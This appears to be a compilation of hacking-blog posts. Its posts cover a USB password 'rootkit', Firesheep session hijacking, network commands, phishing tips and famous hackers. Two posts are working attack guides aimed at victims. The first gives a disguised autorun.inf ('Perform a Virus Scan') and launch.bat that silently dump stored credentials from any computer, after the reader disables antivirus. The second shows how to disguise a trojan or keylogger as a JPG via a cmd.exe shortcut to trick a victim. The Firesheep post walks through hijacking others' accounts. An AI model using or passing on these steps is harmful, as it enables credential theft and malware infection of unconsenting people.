How to Sniff Passwords Using USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

 MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt 

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

NOTE: This procedure will only recover the stored passwords (if any) on the Computer. and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

BlackSheep – Detect Users Of FireSheep On The Network

As you surely know, things blew up recently at Toorcon 12 with the release of the much talked about Firefox plugin called Firesheep.

There were various discussions about how to mitigate against it like using Firefox plug-ins to force SSL connections (where available). Microsoft also tried to secure Hotmail with SSL but kinda b0rked that too.

For the 1 person in the World left that doesn’t know, Firesheep allowed any user to seamlessly hijack the web session of another user on the same local network. Although such attacks are not new, the ease of use presented by Firesheep brought session hijacking to the masses.

BlackSheep, also a Firefox plugin is designed to combat Firesheep. BlackSheep does this by dropping ‘fake’ session ID information on the wire and then monitors traffic to see if it has been hijacked. While Firesheep is largely passive, once it identifies session information for a targeted domain, it then makes a subsequent request to that same domain, using the hijacked session information in order to obtain the name of the hijacked user along with an image of the person, if available. It is this request that BlackSheep identifies in order to detect the presence of Firesheep on the network. When identified, the user will be receive the following warning message:

t should be noted that Firesheep and BlackSheep cannot be installed on the same Firefox instance as they share much of the same code base. If you want to run both Firesheep and BlackSheep on the same machine, they should be installed in separate Firefox profiles.

Requirements

In order to install BlackSheep, you need:

  • Mac OS X: 10.5 or newer on an Intel processor.
  • Windows: XP or newer. Install Winpcap first!
  • Firefox: 3.5 or newer. 32-bit only.
  • Linux : details here

You can download BlackSheep here:

blacksheep-latest.xpi

Network Hacking

Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)–

c:/>ping hostname.com

example:- c:/>ping http://www.google.comVarious attributes used with ‘Ping’ command and their usage can be viewed by just typing c:/>ping at the command prompt.

Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It’s syntax is (at command prompt)–

c:/>netstat -n

IP address is also being given, But I am hiding my IP here for security purpose.

Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)–

c:/>telnet hostname.com

By default telnet connects to port 23 of remote computer.
So, the complete syntax is-

c:/>telnet http://www.hostname.com port
Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It’s syntax is (at command prompt)–

example:- c:/>tracert http://www.insecure.inHere “*    *    *    Request timed out.” indicates that firewall installed on that system block the request and hence we can’t obtain it’s IP address.

various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.

The information obtained by using tracert command can be further used to find out exact operating system running on target system.

example:- c:/>telnet http://www.yahoo.com 21 or c:/>telnet 192.168.0.5 21

Hide EXE File into JPG

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options ‘show hidden files and folders’ is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let’s say it’s called ‘server.exe’ (that’s why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this ‘server.exe’ to whatever you want, let’s say for example ‘picture.jpeg’

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this ‘picture.jpeg’ in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, ‘me.jpeg’.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field ‘Start In’ and leave it empty.

9) Then on field ‘Target’ you need to write the path to open the other file (the server renamed ‘picture.jpeg’) so you have to write this :-
‘C:\WINDOWS\system32\cmd.exe /c picture.jpeg’

10) The last field, ‘c picture.jpeg’ is always the name of the first file. If you called the first file ‘soccer.avi’ you gotta write ‘C:\WINDOWS\system32\cmd.exe /c soccer.avi’.

11) So what you’re doing is when someone clicks on ‘me.jpeg’, a cmd will execute the other file ‘picture.jpeg’ and the server will run.

12) On that file ‘me.jpeg’ (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties ‘Hidden’ for the first file ‘picture.jpeg’ if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to ‘picture2.jpeg’ and the shortcut to ‘picture1.jpeg’.
This way the shortcut will show up first. If you set hidden properties to the server ‘picture.jpeg’ then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Rename A Start Button – Windows xp

To rename the start button, you will just need to do is download Resource hacker.

Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.

To Download Click here

First Step : The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe
The category we are going to be using is String Table In Resource Hacker. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable as shown in Fig. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry.

Compile and save (actually save as) with another name like expmann.exe

Second Step: Modify the Registry Now that the modified expmann.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open: field. Navigate to:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

the Right pane, double click the Shell entry to open the Edit String dialog box as shown in Fig.  In Value data: line, enter the name that was used to save the modified expmann.exe file. Click OK.

Close Registry Editor and reboot the entire system. If all went as planned you should see your new Start button with the revised text.

Firesheep Makes Facebook Hacking Easy

Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch,  Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control  any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account.

What is Session Hijacking?

In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account.

How can a Hacker use Firesheep to Hack a Facebook or any other account?

Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:

Method

1. First of all download “Firesheep” from the above link and use the “openwith” option in the firefox browser.

2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep.

3. Now click on the top left button “Start capturing” and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly.

Prevent ur Account from Hackers

Here I will be discussing how u can protect ur account’s from Hackers or for the right word Crackers.

1. Beware of Phishing :-

Phishing is one of the most widely used and simplest ways of gaining access to one’s account thru hacking.Phishers are pages which are uploaded into hosting sites and then given away to victims….

In appearance the phisher looks exactly as ur common login page.

For eg :-taking into consideration an orkut account and u received a link by someone asking u to click on that link.

Now when u click on that link , it takes u to a new page that looks like ur orkut account login page.

Don’t be fooled by that , now most of the people will without a second thought enter their username and passcode and press enter.But u will not be logged into ur account.It is a phisher , ur login info will be sent to the person who sent u the link.

So no matter who and however trusty that person is do not login on any other page except.

Or else ur account might be on the verge of getting hacked……

PHISHING DONE IN ANOTHER WAY

MANY TIMES .. PHISHERS WILL SEND U A MAIL IN UR EMAIL ID .. WITH THE ID — GMAILPASSWORDRECOVERE .. ET ETC .. AND TELLING U TO VERIFY UR ACCOUNT OR ELSE UR ACCOUNT WILL BE DELETED .

DON’T EVER LOGIN AT ANY PAGE OTHER THAN THE ORIGINAL WEBSITE

2. Keep a strong password :-

Always have a passcode with many characters , minimum 6 characters having a combination of small and big letters and number and special characters like “$”.Then there are very minimal chances that ur passcode will be hacked…..

3. Keyloggers :-

Many times u make online friends that u do not know personally.Then after many chats the person tells u he created a game and wanted u to see it and give a review.U gladly accept it, the game might actually be a keylogger.Keyloggers have become very common nowadays.Now when u double click on the keylogger it gets activated.The next time u login into any page ur username and passocode will be sent to the other guy…..

So do not accept such things from people u do not trust very much…….

4. Keeping ur antivirus up-to-date :-

Many people believe that antiviruses do nothing and hence they do not install them , and think that if a virus infects their PC then they will format the PC.But this is wrong , whenever a virus enters ur PC then there is a very strong possibility that a bad sector is created in ur PC.Antiviruses thus protect ur PC….

Most famous Black Hat Hackers

This article is about Most famous Black Hat Hackers in this world.

1. Jonathan James:

James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. In an  anonymous PBS interview, he professes, “I was just looking around, playing around. What was fun for me was a challenge to see what I  could pull off.”

James’s major intrusions targeted high-profile organizations. He installed a backdoor into a Defense Threat Reduction Agency server. The  DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological,  chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive emails and capture employee  usernames and passwords.

James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, “The software supported the International Space Station’s physical environment, including control of the temperature and humidity within the living space.” NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost. James explained that he downloaded the code to supplement his studies on C programming, but contended, “The code itself was crappy . . . certainly not worth $1.7 million like they claimed.”

Given the extent of his intrusions, if James, also known as “c0mrade,” had been an adult he likely would have served at least 10 years. Instead, he was banned from recreational computer use and was slated to serve a six-month sentence under house arrest with probation. However, he served six months in prison for violation of parole. Today, James asserts that he’s learned his lesson and might start a computer security company.

2. Adrian Lamo:

Lamo’s claim to fame is his break-ins at major organizations like The New York Times and Microsoft. Dubbed the “homeless hacker,” he used  Internet connections at Kinko’s, coffee shops and libraries to do his intrusions. In a profile article, “He Hacks by Day, Squats by Night,” Lamo  reflects, “I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional.”

Lamo’s intrusions consisted mainly of penetration testing, in which he found flaws in security, exploited them and then informed companies of  their shortcomings. His hits include Yahoo!, Bank of America, Citigroup and Cingular. When white hat hackers are hired by companies to do  penetration testing, it’s legal. What Lamo did is not.

When he broke into The New York Times’ intranet, things got serious. He added himself to a list of experts and viewed personal information on contributors, including Social Security numbers. Lamo also hacked into The Times’ LexisNexis account to research high-profile subject matter.

For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as an award-winning journalist and public speaker.

3. Kevin Mitnick:

A self-proclaimed “hacker poster boy,” Mitnick went through a highly publicized pursuit by authorities. His mischief was hyped by the  media but his actual offenses may be less notable than his notoriety suggests. The Department of Justice describes him as “the most  wanted computer criminal in United States history.” His exploits were detailed in two movies: Freedom Downtime and Takedown.

Mitnick had a bit of hacking experience before committing the offenses that made him famous. He started out exploiting the Los Angeles  bus punch card system to get free rides. Then, like Apple co-founder Steve Wozniak, dabbled in phone phreaking. Although there were  numerous offenses, Mitnick was ultimately convicted for breaking into the Digital Equipment Corporation’s computer network and  stealing software.

Mitnick’s mischief got serious when he went on a two and a half year “coast-to-coast hacking spree.” The CNN article, “Legendary computer hacker released from prison,” explains that “he hacked into computers, stole corporate secrets, scrambled phone networks and broke into the national defense warning system.” He then hacked into computer expert and fellow hacker Tsutomu Shimomura’s home computer, which led to his undoing.

Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.


white hat vs black hat

This article is about computer hackers

White hat

A white hat is the hero or good guy, especially in computing slang, where it refers to an ethical hacker or penetration tester who focuses on securing and protecting IT systems.

White hat hackers are computer security experts, who specialize in penetration testing, and other testing methodologies, to ensure that a company’s information systems are secure. White hat hackers are also called “sneakers”, red teams, or tiger teams. These security experts may utilize a variety of methods to carry out their tests, including social engineering tactics, use of hacking tools, such as Metasploit, which exploits known vulnerabilities, and attempts to evade security to gain entry into secured areas.

Black hat

Black hat is used to describe a hacker (or, if you prefer, cracker) who breaks into a computer system or network with malicious intent. Unlike a white hat hacker, the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose. The black hat hacker may also make the exploit known to other hackers and/or the public without notifying the victim. This gives others the opportunity to exploit the vulnerability before the organization is able to secure it.